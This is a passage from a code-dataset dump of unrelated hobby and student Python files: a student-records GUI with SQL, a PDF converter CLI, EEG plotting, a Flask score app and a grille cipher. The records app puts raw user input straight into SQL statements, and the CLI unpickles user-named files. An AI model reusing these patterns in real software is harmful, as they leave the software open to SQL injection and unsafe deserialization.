[sg.Text('id_aluno', size=(10, 1)), sg.Input(key='id_aluno')],\r\n [sg.Combo(values=Series, key=\"serie\", size=(20, 1))],\r\n [sg.Combo(values=Turmas, key=\"turma\", size=(20, 1))],\r\n [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n ]\r\n\r\n janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n evento, dados = janela.read()\r\n id_evento = dados['id_evento']\r\n id_aluno = dados['id_aluno']\r\n Serie = dados['serie']\r\n Turma = dados['turma']\r\n comando = f'INSERT INTO Turmas(id_eventos_fk,id_Alunos_fk,Serie,Turma)VALUES({id_evento},{id_aluno},\"{Serie}\",\"{Turma}\")'\r\n cursor.execute(comando)\r\n conexao.commit()\r\n janela.close()\r\n else:\r\n layout = [\r\n [sg.Text('Digite o id do evento, id do aluno, Serie e Turma')],\r\n [sg.Text('id_Evento: ', size=(10, 1)), sg.Input(key='id_evento')],\r\n [sg.Text('id_aluno', size=(10, 1)), sg.Input(key='id_aluno')],\r\n [sg.Combo(values=Series, key=\"serie\", size=(20, 1))],\r\n [sg.Combo(values=Turmas, key=\"turma\", size=(20, 1))],\r\n [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n ]\r\n\r\n janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n evento, dados = janela.read()\r\n id_evento = dados['id_evento']\r\n id_aluno = dados['id_aluno']\r\n Serie = dados['serie']\r\n Turma = dados['turma']\r\n comando = f'UPDATE Turmas SET id_Eventos_fk = {id_evento},id_Alunos_fk = {id_aluno},Serie={Serie},Turma={Turma} where id_Turma={id}'\r\n cursor.execute(comando)\r\n conexao.commit()\r\n janela.close()\r\n\r\n\r\n\r\ndef Grafico_Genero_Esporte():\r\n Qtd_Masculino_Futebol = 0\r\n Qtd_Masculino_Volei = 0\r\n Qtd_Futebol = 0\r\n Qtd_Volei = 0\r\n\r\n\r\n Comando = f'''SELECT Sexo, Esporte FROM Alunos, Eventos\r\n where id_Alunos = id_Alunos_fk;'''\r\n cursor.execute(Comando)\r\n resultado = cursor.fetchall()\r\n i = 0\r\n for i in range(len(resultado)):\r\n if resultado[i][1] == \"Futebol\":\r\n if resultado[i][0] == \"M\":\r\n Qtd_Masculino_Futebol+=1\r\n Qtd_Futebol += 1\r\n elif resultado[i][1] == \"Volei\":\r\n if resultado[i][0] == \"M\":\r\n Qtd_Masculino_Volei+=1\r\n Qtd_Volei+=1\r\n Cont_Genero = [Qtd_Masculino_Futebol,Qtd_Masculino_Volei]\r\n Qtd_Incrito_por_Esporte = [Qtd_Futebol,Qtd_Volei]\r\n\r\n plt.bar(Esportes,Qtd_Incrito_por_Esporte,color='pink', label=\"Quantidade de Menina\")\r\n plt.bar(Esportes,Cont_Genero,color='b',label=\"Quantidade de Menino\")\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\ndef Grafico_Genero_Turma():\r\n Qtd_Masculino_3 = 0\r\n Qtd_Masculino_2 = 0\r\n Qtd_Masculino_1 = 0\r\n\r\n Qtd_3 = 0\r\n Qtd_2 = 0\r\n Qtd_1 = 0\r\n\r\n\r\n\r\n Comando = f'''SELECT Sexo, Serie FROM Alunos, Turmas\r\n where id_Alunos = id_Alunos_fk;'''\r\n cursor.execute(Comando)\r\n resultado = cursor.fetchall()\r\n i = 0\r\n print(resultado)\r\n for i in range(len(resultado)):\r\n if resultado[i][1] == '3':\r\n if resultado[i][0] == \"M\":\r\n Qtd_Masculino_3+=1\r\n Qtd_3 += 1\r\n elif resultado[i][1] == '2':\r\n if resultado[i][0] == \"M\":\r\n Qtd_Masculino_2+=1\r\n Qtd_2+=1\r\n elif resultado[i][1] == '1':\r\n if resultado[i][0] == \"M\":\r\n Qtd_Masculino_1 += 1\r\n Qtd_1 += 1\r\n\r\n Cont_Genero = [Qtd_Masculino_3,Qtd_Masculino_2,Qtd_Masculino_1]\r\n Qtd_Incrito_por_Turma = [Qtd_3,Qtd_2,Qtd_1]\r\n\r\n plt.bar(Series,Qtd_Incrito_por_Turma,color='pink', label=\"Quantidade de Menina\")\r\n plt.bar(Series,Cont_Genero,color='b',label=\"Quantidade de Menino\")\r\n plt.legend()\r\n plt.show()\r\n\r\ndef Grafico_Esporte_MaisEcolhido():\r\n Contagem_Futebol = 0\r\n Contagem_Volei = 0\r\n\r\n Comando = f'''SELECT Esporte FROM Eventos'''\r\n cursor.execute(Comando)\r\n resultado = cursor.fetchall()\r\n i = 0\r\n for i in range(len(resultado)):\r\n if resultado[i][0] == \"Futebol\":\r\n Contagem_Futebol +=1\r\n else:\r\n Contagem_Volei +=1\r\n\r\n\r\n Apuração = [Contagem_Futebol,Contagem_Volei]\r\n plt.pie(Apuração,labels=Esportes,autopct='%1.0f%%')\r\n plt.legend()\r\n plt.show()\r\n\r\ndef Atualizar():\r\n layout = [\r\n [sg.Text('Digite o nome do que você quer mudar(Nome, Evento, Turma) e o ID')],\r\n [sg.Text('Nome: ', size=(10, 1)), sg.Input(key='nome')],\r\n [sg.Text('ID:', size=(10, 1)), sg.Input(key='id')],\r\n [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n ]\r\n janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n evento, dados = janela.read()\r\n nome_Atualizar = dados['nome']\r\n id_atualizar = dados['id']\r\n\r\n if nome_Atualizar == 'Evento':\r\n CadastrarEvento(id_atualizar)\r\n elif nome_Atualizar == 'Turma':\r\n CadastrarTurma(id_atualizar)\r\n else:\r\n CadastrarAluno(id_atualizar)\r\n janela.close()\r\n\r\ndef Listar():\r\n comando = 'SELECT Nome,Sexo,Esporte FROM Alunos, Eventos where id_Alunos = id_Alunos_fk;'\r\n cursor.execute(comando)\r\n resultado = cursor.fetchall()\r\n layout = [\r\n [sg.Listbox(values=resultado, size=(30, 6), key='esc')],\r\n [sg.Button('OK')]\r\n ]\r\n janela = sg.Window('esc', layout)\r\n evento, dados = janela.read()\r\n janela.close()\r\n comando = 'SELECT Nome,Serie,Turma FROM Alunos, Turmas where id_Alunos = id_Alunos_fk;'\r\n cursor.execute(comando)\r\n resultado = cursor.fetchall()\r\n layout = [\r\n [sg.Listbox(values=resultado, size=(30, 6), key='esc')],\r\n [sg.Button('OK')]\r\n ]\r\n janela = sg.Window('esc', layout)\r\n evento, dados = janela.read()\r\n janela.close()\r\n\r\ndef Deletar():\r\n layout = [\r\n [sg.Text('Digite o nome do que você quer Deletar(Nome, Evento, Turma) e o ID')],\r\n [sg.Text('Nome: ', size=(10, 1)), sg.Input(key='nome')],\r\n [sg.Text('ID:', size=(10, 1)), sg.Input(key='id')],\r\n [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n ]\r\n janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n evento, dados = janela.read()\r\n nome_Atualizar = dados['nome']\r\n id_atualizar = dados['id']\r\n\r\n if nome_Atualizar == 'Evento':\r\n comando = f'DELETE from Eventos where id_Eventos= {id_atualizar}'\r\n cursor.execute(comando)\r\n conexao.commit()\r\n elif nome_Atualizar == 'Turma':\r\n comando = f'DELETE from Turmas where id_Turma= {id_atualizar}'\r\n cursor.execute(comando)\r\n conexao.commit()\r\n else:\r\n comando = f'DELETE from Alunos where id_Alunos= {id_atualizar}'\r\n cursor.execute(comando)\r\n conexao.commit()\r\n\r\n janela.close()\r\n\r\n\r\nescolha = ''\r\nwhile escolha != '8 - Sair':\r\n\r\n opções = ['1 - Cadastrar', '2 - Atualizar', '3 - Listar', '4 - Deletar',\r\n '5 - Gráfico Relação Gênero Turma', '6 - Grafico Esporte mais escolhido', '7 - Grafico Relação Gênero Eventos', '8 - Sair']\r\n\r\n layout = [\r\n [sg.Listbox(values=opções, size=(30, 10), key='esc')],\r\n [sg.Button('OK')]\r\n ]\r\n janela = sg.Window('Menu principal', layout)\r\n evento, dados = janela.read()\r\n\r\n\r\n escolha = dados['esc'][0]\r\n janela.close()\r\n\r\n\r\n if escolha == '1 - Cadastrar':\r\n CadastrarAluno(0)\r\n CadastrarEvento(0)\r\n CadastrarTurma(0)\r\n\r\n\r\n if escolha == '2 - Atualizar':\r\n Atualizar()\r\n if escolha == '3 - Listar':\r\n Listar()\r\n\r\n if escolha == '4 - Deletar':\r\n Deletar()\r\n if escolha == '5 - Gráfico Relação Gênero Turma':\r\n Grafico_Genero_Turma()\r\n if escolha == '6 - Grafico Esporte mais escolhido':\r\n Grafico_Esporte_MaisEcolhido()\r\n if escolha == '7 - Grafico Relação Gênero Eventos':\r\n Grafico_Genero_Esporte()\r\n","repo_name":"Luiz-Henrique03/Python_SQL","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":13266,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21027620989","text":"# 2609\nimport sys\nfrom math import gcd\n#a, b = map(int,sys.stdin.readline().split())\n\na=24\nb=18\n\n# 유클리드 호제법 \n# 내장함수써도댐\ndef gcd(a,b):\n \n while b > 0:\n a,b = b, a%b\n return a\n\ndef lcm(a,b):\n return((a*b)//gcd(a,b))\n\nprint(gcd(a,b))\nprint(lcm(a,b))\n\n'''\n\nfor i in range (min(a,b),0,-1):\n if a%i == 0 and b%i== 0:\n print(i)\n break\n\n\nfor i in range(max(a,b),(a*b),+1):\n if i%a ==0 and i%b ==0:\n print(i)\n break \n'''\n","repo_name":"skylermbang/Lectures-","sub_path":"algo/question16.py","file_name":"question16.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16671978408","text":"import os\nimport sys\nimport argparse\nimport gettext\nimport pickle\nimport locale\nimport logging\nimport traceback\n\nfrom PIL import Image\nfrom stpdf.core.converter import Converter\nfrom pytesseract import image_to_string\nfrom pytesseract.pytesseract import TesseractNotFoundError\nfrom _version import (__version__, __version2__, __releaseDate__,\n __releaseDate2__, __developer__, __developer2__,\n __devhome__)\n\n\nclass STPDFCLI(object):\n def __init__(self, source, dest, *args, **kwargs):\n self.source = source\n self.dest = dest\n self.logger = kwargs.get(\"logger\")\n self.settings = kwargs.get(\"settings\")\n self.args = kwargs.get(\"uargs\")\n self.res = kwargs.get(\"resolution\", 90.0)\n self.deskew = kwargs.get(\"deskew\", False)\n self.app_lang = self.settings[\"lang\"]\n if not self.check_tesseract() and self.deskew:\n m = _(\"Setting deskew to false, tesseract wasn't found on your machine\")\n self.logger.warning(m)\n self.deskew = False\n self.print_values()\n\n def print_values(self):\n s = _(\"Source\")\n d = _(\"Destination\")\n splt = _(\"Split\")\n splt_a = _(\"Split at\")\n dsk = _(\"Deskew\")\n r = _(\"Resolution\")\n dc = _(\"Do copy\")\n mp = _(\"Make PDF\")\n ll = _(\"Log level\")\n l = _(\"Language\")\n sk = _(\"Skip check\")\n v0 = \"\\n\\t%s: %s\\n\\t%s: %s\" % (s, self.source, d, self.dest)\n v1 = \"\\n\\t%s: %s\\n\\t%s: %s\" % (splt, self.settings[\"split\"],\n splt_a, self.settings[\"split_at\"])\n v2 = \"\\n\\t%s: %s\\n\\t%s: %s\" % (dsk, self.settings[\"deskew\"],\n r, self.settings[\"res\"])\n v3 = \"\\n\\t%s: %s\\n\\t%s: %s\" % (dc, self.settings[\"d_copy\"],\n mp, self.settings[\"m_pdf\"])\n v4 = \"\\n\\t%s: %s\\n\\t%s: %s\" % (ll, self.settings[\"log_level\"],\n l, self.settings[\"lang\"])\n v5 = \"\\n\\t%s: %s\" % (sk, self.settings[\"skip_check\"])\n values = v0 + v1 + v2 + v3 + v4 + v5\n msg = \"%s:%s\" % (_(\"Starting converter with values\"), values)\n self.logger.info(msg)\n if not self.settings[\"skip_check\"]:\n ans = input(\"Continue? (Y): \")\n if ans.upper() != \"Y\":\n self.logger.info(_(\"Exiting now\"))\n sys.exit(1)\n\n def run_converter(self):\n splt = (self.settings[\"split\"], self.settings[\"split_at\"])\n cvt = Converter(self.source, self.dest,\n split=splt,\n deskew=self.deskew,\n lang=self.app_lang,\n save_files=self.settings[\"d_copy\"],\n make_pdf=self.settings[\"m_pdf\"])\n try:\n for line in cvt.process_all():\n self.logger.info(line)\n except Exception as e:\n self.logger.critical(\"Critical exception:\\n\" + str(e) + \"\\n\\n\" + \"Exiting now\")\n sys.exit(1)\n\n def check_tesseract(self):\n img = Image.new('RGB', (60, 30), color='red')\n try:\n image_to_string(img)\n img.close()\n return True\n except TesseractNotFoundError:\n img.close()\n return False\n\n\n# Function to verify correct usage of args\n# before providing them to STPDFCLI\ndef verify_args(args):\n kv = getattr(args, \"kv\", None)\n lv = getattr(args, \"lv\", None)\n if kv is not None and lv is not None:\n return _(\"Can't use --keep-values with --load-values\")\n if lv is None:\n if not os.path.isdir(args.source) or not os.path.isdir(args.destination):\n msd = _(\"Missing source or destination\")\n s = _(\"Source\")\n d = _(\"Destination\")\n msg = \"%s\\n\\t%s: %s\\n\\t%s: %s\" % (msd, s, d, args.source,\n args.destination)\n return msg\n s = getattr(args, \"s\", None)\n if s is not None:\n try:\n if int(s) <= 2:\n return \"%s: %s\" % (_(\"Split at value too low\"), s)\n except ValueError as e:\n return \"%s: %s\" % (_(\"Split at must be a number\"), s)\n r = getattr(args, \"r\", None)\n if r is not None:\n if r > 100.0:\n return _(\"Max resolution is 100.0\")\n return True\n\n\n# Installs language based on lang: str - \"en\" or \"pt\"\ndef install_lang(lang):\n available_langs = [\n \"en\",\n \"pt\",\n \"es\"\n ]\n if lang in available_langs and lang != \"en\":\n modl = \"%s_cli\" % lang\n current_locale, __ = locale.getdefaultlocale()\n cl = current_locale.split(\"_\")\n if lang != cl[0]:\n current_locale = \"%s_%s\" % (lang, lang.upper())\n lang = gettext.translation(modl,\n \"locale\",\n [current_locale])\n lang.install()\n\n\ndef check_settings(args):\n kv = getattr(args, \"kv\")\n lv = getattr(args, \"lv\")\n splt_a = getattr(args, \"sa\") or 0\n splt = True if splt_a > 0 else False\n settings = {\n \"source\": getattr(args, \"source\"),\n \"dest\": getattr(args, \"destination\"),\n \"split\": splt,\n \"split_at\": splt_a,\n \"deskew\": getattr(args, \"ds\"),\n \"res\": getattr(args, \"r\"),\n \"d_copy\": False,\n \"m_pdf\": True,\n \"log_level\": \"INFO\",\n \"lang\": getattr(args, \"l\"),\n \"skip_check\": getattr(args, \"sc\")\n }\n if kv is not None:\n kv = \"%s.pckl\" % kv if not kv.endswith(\".pckl\") else kv\n if not os.path.isfile(kv):\n pickle.dump(settings, open(kv, \"wb\"))\n else:\n raise FileExistsError(kv)\n elif lv is not None:\n lv = \"%s.pckl\" % lv if not lv.endswith(\".pckl\") else lv\n if not os.path.isfile(lv):\n raise FileNotFoundError(lv)\n else:\n settings = pickle.load(open(lv, \"rb\"))\n return settings\n\n\ndef install_logger(l_level):\n l_levels = [\n \"INFO\",\n \"WARNING\",\n \"CRITICAL\",\n \"ERROR\",\n \"DEBUG\"\n ]\n n_level = None\n if l_level not in l_levels:\n sys.stdout.write(\"%s: %s\\n\" % (_(\"Invalid log level\"), l_level))\n l_level = \"INFO\"\n n_level = getattr(logging, l_level.upper(), 10)\n # Console logger\n log_format = \"%(name)s - %(levelname)s: %(message)s\"\n logging.basicConfig(format=log_format, level=n_level)\n logger = logging.getLogger(\"STPDF-CLI\")\n msg = \"%s: %s\" % (_(\"Console logger is set with log level\"), l_level)\n logger.info(msg)\n return logger\n\n\n# Assembles argparser and returns parsed args\ndef assemble_parser():\n parser = argparse.ArgumentParser(description=_('STPDF - easily convert scans to pdf'))\n parser.add_argument(\"source\",\n nargs=\"?\",\n type=str,\n default=os.getcwd(),\n help=_('Scan images location'))\n parser.add_argument(\"destination\",\n nargs=\"?\",\n type=str,\n default=\"STPDF_Output\",\n help=_('Destination of modified files'))\n parser.add_argument(\"--sa\", \"--split-at\", type=int,\n help=_(\"Number of images per pdf\"))\n parser.add_argument(\"--ds\", \"--deskew\",\n help=_('Removes image rotation, requires tesseract'),\n action=\"store_true\")\n parser.add_argument(\"--r\", \"--resolution\", type=float,\n default=80.0,\n help=_(\"Resolution of final rotated image, must be a value like 90.5\"))\n parser.add_argument(\"--ll\", \"--log-level\", type=str,\n default=\"INFO\",\n help=_(\"Sets the console log level\"))\n parser.add_argument(\"--l\", \"--language\", type=str,\n default=\"en\",\n help=_(\"Switch language, language must be 2 letter code EX: en or pt\"))\n parser.add_argument(\"--kv\", \"--keep-values\",\n type=str,\n help=_(\"Save your current input in a file, can't be used with --lv\"),\n action=\"store\")\n parser.add_argument(\"--lv\", \"--load-values\",\n type=str,\n help=_(\"Load values from settings file, can't be used with --kv\"),\n action=\"store\")\n parser.add_argument(\"--sc\", \"--skip-check\",\n help=_(\"Automatically answers yes when values are verified\"),\n action=\"store_true\")\n parser.add_argument(\"--dc\", \"--do-copy\",\n help=_(\"If True images will be copied to the destination directory, default:False\"),\n default=False,\n action=\"store_true\")\n parser.add_argument(\"--mp\", \"--make-pdf\",\n help=_(\"If True make a pdf out of the processed images, default:True\"),\n default=True,\n action=\"store_true\")\n v_text = \"\\n\\t%s: %s,\\n\\t%s: %s,\" % (_(\"Version\"), __version__,\n _(\"Full version\"), __version2__)\n r_text = \"\\n\\t%s: %s,\\n\\t%s: %s,\" % (_(\"Release date\"), __releaseDate__,\n _(\"Developed by\"), __developer__)\n home = \"\\n\\t%s: %s\" % (_(\"Project home\"), __devhome__)\n all_info = v_text + r_text + home\n parser.add_argument('--version', action='version',\n version='%(prog)s {vi}'.format(vi=all_info))\n args = parser.parse_args()\n return args\n\n\nif __name__ == \"__main__\":\n gettext.install(\"stpdf_cli\")\n args = assemble_parser()\n lang = getattr(args, \"l\")\n install_lang(lang)\n loggr = install_logger(getattr(args, \"ll\"))\n settings = None\n try:\n loggr.info(_(\"Checking settings\"))\n settings = check_settings(args)\n except Exception as e:\n sys.stdout.write(\"\\n\")\n for it in traceback.format_exception(type(e), e, e.__traceback__):\n loggr.debug(it)\n msg = \"%s: %s\" % (_(\"Failed to create settings \"), str(e))\n loggr.critical(msg + \"\\n\")\n sys.exit(1)\n msg = \"%s: %s\" % (_(\"Settings\"), settings)\n loggr.debug(msg)\n has_required = verify_args(args)\n if has_required is True:\n cli = STPDFCLI(args.source, args.destination,\n logger=loggr, settings=settings,\n uargs=args)\n cli.run_converter()\n cli.logger.info(_(\"Finished\"))\n sys.exit(0)\n else:\n loggr.critical(has_required + \"\\n\")\n sys.exit(1)\n","repo_name":"hallowslab/STPDF","sub_path":"src/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":10709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24784835452","text":"import argparse\r\nimport re\r\n\r\n# Set up argparse\r\nparser = argparse.ArgumentParser(description='Convert a subtitle file to a formatted text file.')\r\nparser.add_argument('input_file',\r\n metavar='input_file', type=str, help='The input subtitle file in .srt format')\r\nparser.add_argument('output_file',\r\n metavar='output_file', type=str, help='The output file to write formatted text to')\r\nargs = parser.parse_args()\r\n\r\n# Read the input text from the specified file\r\nwith open(args.input_file, 'r') as file:\r\n input_text = file.read()\r\n\r\n# Use regular expression to find the timestamp and text on separate lines\r\npattern = r'(\\d{2}:\\d{2}:\\d{2}),\\d{3} --> (\\d{2}:\\d{2}:\\d{2}),\\d{3}\\n(.+?)(?=\\n)'\r\nmatches = re.findall(pattern, input_text, re.DOTALL)\r\n\r\n# Write output to the specified file\r\nwith open(args.output_file, 'w') as file:\r\n for i, match in enumerate(matches):\r\n print(f'match {i}: {match}')\r\n start, end, text = match\r\n file.write(f'{start[3:]} - {text}\\n')\r\n # file.write(text)","repo_name":"hu-po/chaptergen","sub_path":"srt_to_chapters.py","file_name":"srt_to_chapters.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26007792884","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 7 17:55:34 2019\nplot normalized EEG spectrogram during NREM to REM transition \nalong with EMG amplitude\n\n@author: tortugar\n\"\"\"\n\nimport sys\nsys.path.append('/Users/tortugar/Google Drive/Penn/Programming/PySleep')\nimport sleepy\nimport numpy as np\nimport matplotlib.pylab as plt\nimport scipy.io as so\nimport os\nimport pandas as pd\nimport seaborn as sns\nimport re\nfrom functools import reduce\n\n\nppath = '/Users/tortugar/Documents/Penn/Data/RawData/mPFCData'\nrecordings = ['J55_111018n1', 'J53_110718n1', 'J31_101618n1', 'J54_110518n1']\n#recordings = ['JS80_050319n1', 'JS79_050319n1']\n#recordings = ['JS80_050319n1']\n\nppath = '/Users/tortugar/Documents/Penn/Data/RawData/'\nwt_rec = 'wt_recordings.txt'\n(recordings,E) = sleepy.load_recordings(ppath, wt_rec)\n\n# minimum duration of REM period\n# to be included in calculation:\nrem_thr = 30\npre = 60\npost = 60\nfmax = 150\nfmin = 0\nmu = [5, 50]\npeeg = True\n\n# get list of all mice \nmice = []\nfor name in recordings:\n idf = re.split('_', name) [0]\n if idf not in mice:\n mice.append(idf)\n\n\nspec_mice = {m:[] for m in mice}\nampl_mice = {m:[] for m in mice}\nfor name in recordings:\n idf = re.split('_', name) [0]\n\n # load EMG\n Q = so.loadmat(os.path.join(ppath, name, 'msp_%s.mat'%name), squeeze_me=True)\n SM = Q['mSP']\n freq = Q['freq']\n df = freq[1]-freq[0]\n imu = np.where((freq>=mu[0]) & (freq<=mu[-1]))[0]\n ampl = np.sqrt(SM[imu,:].sum(axis=0)*df)\n \n # load normalized spectrogram\n #SP, t, freq = sleepy.normalize_spectrogram(ppath, name, fmax, pplot=False)\n if peeg:\n P = so.loadmat(os.path.join(ppath, name, 'sp_' + name + '.mat'), squeeze_me=True)\n SP = P['SP']\n else:\n # use EMG\n P = so.loadmat(os.path.join(ppath, name, 'msp_' + name + '.mat'), squeeze_me=True)\n SP = P['mSP']\n \n freq = P['freq']\n t = P['t']\n\n ifreq = np.where((freq<=fmax) & (freq>=fmin))[0]\n SP = SP[ifreq,:]\n\n sp_mean = SP.mean(axis=1)\n SP = np.divide(SP, np.tile(sp_mean, (SP.shape[1], 1)).T)\n\n M = sleepy.load_stateidx(ppath, name)[0]\n seq = sleepy.get_sequences(np.where(M==1)[0])\n \n SR = sleepy.get_snr(ppath, name)\n NBIN = np.round(2.5*SR)\n dt = NBIN * 1.0/SR\n \n ipre = int(np.round(pre/dt))\n ipost = int(np.round(post/dt))\n \n for s in seq:\n if len(s)*dt >= rem_thr and s[0]-pre >=0 and s[0]+ipost < len(M):\n tmp = SP[:, s[0]-ipre:s[0]+ipost]\n spec_mice[idf].append(tmp)\n\n tmp = ampl[s[0]-ipre:s[0]+ipost]\n ampl_mice[idf].append(tmp)\n \nn = ipre+ipost\nampl_mx = np.zeros((len(mice), n))\nspec_mx = np.zeros((len(ifreq), n, len(mice)))\n\nfor (i, idf) in zip(range(n), mice):\n ampl_mx[i,:] = np.array(ampl_mice[idf]).mean(axis=0)\n spec_mx[:,:,i] = np.array(spec_mice[idf]).mean(axis=0)\n \n\n# plot figure ##################\nsns.set()\nplt.ion()\nplt.figure()\nt = np.arange(-ipre, ipost)*dt\nax = plt.axes([0.1, 0.4, 0.8, 0.5])\nax.pcolor(t, freq[ifreq], spec_mx.mean(axis=2), cmap='jet')\nsleepy.box_off(ax)\nax.set_xticklabels('') \nplt.ylabel('Freq (Hz)')\n\n\namp_data = list(np.reshape(ampl_mx, (len(mice)*len(t),)))\namp_time = list(t)*len(mice)\namp_idf = reduce(lambda x,y: x+y, [[b]*len(t) for b in mice])\ndata = [[a,b,c] for (a,b,c) in zip(amp_idf, amp_time, amp_data)]\ndf = pd.DataFrame(columns=['Idf', 'Time', 'Ampl'], data=data)\n\nax2 = plt.axes([0.1, 0.1, 0.8, 0.2])\nsns.lineplot(data=df, x='Time', y='Ampl', ci='sd')\n#plt.plot(t, ampl_mx.mean(axis=0), color='r')\nplt.ylim([0, 30])\nplt.xlabel('Time (s)')\nplt.xlim([t[0], t[-1]])\nsleepy.box_off(ax2)\nplt.show()\n\n\n\n\n\n\n\n","repo_name":"tortugar/Lab","sub_path":"PyScripts/PhasicEvents/spont_rem.py","file_name":"spont_rem.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"34753598894","text":"import sqlite3\nfrom random import randint\nfrom pprint import pprint\nfrom flask import Flask, g, render_template, jsonify, url_for\nimport sys\n\nDATABASE = 'reikuappdb.db'\n\napp = Flask(__name__)\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect(DATABASE)\n return db\n\ndef query_db(query, args=(), one=False):\n cur = get_db().execute(query, args)\n rv = cur.fetchall()\n cur.close()\n return (rv[0] if rv else None) if one else rv\n\n@app.route(\"/\")\ndef index():\n lugares = query_db('select * from lugares')\n item = lugares[randint(0, len(lugares) - 1)]\n pprint(lugares)\n return render_template('index.html', item = item)\n\n\n@app.route(\"/nosotros\")\ndef nosotros():\n return render_template('nosotros.html')\n\n@app.route('/json')\ndef json_response():\n lugares = query_db('select * from lugares')\n\n lugares_dict = []\n\n for i in lugares:\n lugares_dict.append({\n \"titulo\": i[1],\n \"subtitulo\": i[2],\n \"latitud\": i[3],\n \"longitud\": i[4],\n \"imagen\": i[5],\n \"descripcion\": i[6],\n \"fuente\": i[7],\n })\n\n return jsonify(lugares_dict)\n\n@app.route('/insertar_score//')\ndef score(nombre, score):\n\n conn = sqlite3.connect(DATABASE)\n c = conn.cursor()\n\n item = [nombre, score]\n\n try:\n c.execute('insert into score (jugador, puntaje) values (?,?)', item)\n except sqlite3.IntegrityError as e:\n return jsonify({\"success\": False, \"message\": \"Ha ocurrido un error al insertar los datos\"})\n\n conn.commit()\n\n return jsonify({\"success\": True, \"message\": \"Se han insertado los datos exitosamente\"})\n\n\n@app.route('/getscore')\ndef lista_scores ():\n scores=query_db('select * from score')\n return jsonify(scores)","repo_name":"solbencas/reikuaap.py","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"es","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"40981989917","text":"\ndef rotate (Matrix,right):\n MatrixAux = [row[:] for row in Matrix]\n n=len(Matrix)\n if right:\n for i in range(0,n):\n for j in range(0,n):\n MatrixAux[i][j] =Matrix[n-1-j][i] \n return MatrixAux\n else:\n for i in range(0,n):\n for j in range(0,n):\n MatrixAux[n-1-j][i] =Matrix[i][j] \n return MatrixAux\n\ndef encrypt (Matrix,plainText, right):\n n=len(Matrix)\n plainText_list = list(plainText)\n T=[[0]*n for i in range(n)]\n \n o=0\n for k in range(0,4):\n for i in range(0,n):\n for j in range(0,n):\n if(Matrix[i][j]==1):\n T[i][j] = plainText_list[o]\n o+=1\n Matrix= rotate(Matrix,right)\n cypherText=\"\"\n \n for i in range(0,n):\n for j in range(0,n):\n cypherText+=T[i][j]\n return cypherText\n\n\ndef Decrypt (Matrix,cypherText, right):\n n=len(Matrix)\n cypherText_list = list(cypherText)\n T=[[0]*n for i in range(n)]\n \n p=0\n for i in range(0,n):\n for j in range(0,n):\n T[i][j] = cypherText_list[p]\n p+=1\n plainText=\"\"\n for k in range(0,4):\n for i in range(0,n):\n for j in range(0,n):\n if(Matrix[i][j]==1):\n plainText+=T[i][j]\n Matrix=rotate(Matrix,right)\n\n return plainText\n\nprint(\"\\n Griller Cipher\\n\")\n#print(\"Ingrese, el tamano de la matriz: \")\n#n=input()\n#Matrix = [ [-1 for columna in range(0,n)] for fila in range (0,n)]\n#for i in range(0,n):\n# for j in range(0,n):\n# print(\"\\n Ingrese, el tamano de la matriz en la posicion \\n\",\" \",i,\" \",j)\n# Matrix[i][j]=input()\n#print(\"Por Favor ingrese el sentido giratorio(1, para derecha o 0, para izquierda)\")\n#sentido=input()\n#if(sentido==1):\n# sentido=True\n#else: sentido=False\n#\n\nMatrix=[[1,0,0,0],[0,0,0,0],[0,1,0,1],[0,0,1,0]]\nsentido=True\n\nbegin=1\nwhile(begin==1):\n print(\" Options: \\n 0. To close the program.\\n 1. To encrypt\\n 2. To decrypt\\n Enter value: \")\n instruction=input()\n if(instruction==1):\n print(\" Enter the phrase to encrypt in CAPITAL LETTER: \")\n plainText=input()\n print(\" His encryption was: \",encrypt(Matrix,plainText,sentido))\n else:\n if(instruction==2):\n print(\" Enter the phrase to Decrypt in CAPITAL LETTER:\")\n encryptText=input()\n print(\" Your Decryption was: \",Decrypt(Matrix,encryptText,sentido))\n else: begin=0\n print(\"\\n Press enter to continue...\")\n input()","repo_name":"adchavesm/Cryptography","sub_path":"GrilleCipher.py","file_name":"GrilleCipher.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69964120170","text":"from collections import defaultdict\nfrom typing import Callable, Dict, Union\n\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nimport torch\n\nclass AccuracyTester:\n \"\"\"\n Abstraction to wrap accuracy calculation, used during training after each epoch\n \"\"\"\n def __init__(self, loader: DataLoader, device: Union[torch.device, str]=\"cuda\") -> None:\n \"\"\"\n\n Args:\n loader (DataLoader): Loader for the test set\n device (Union[torch.device, str], optional): Device to run the testing on. Defaults to \"cuda\".\n \"\"\"\n self.loader = loader\n self.device = device\n \n def __call__(self, model: nn.Module) -> float:\n restore = model.training\n model.eval()\n correct = 0\n num_samples = 0\n with torch.no_grad():\n for images, labels in self.loader:\n images = images.to(self.device)\n labels = 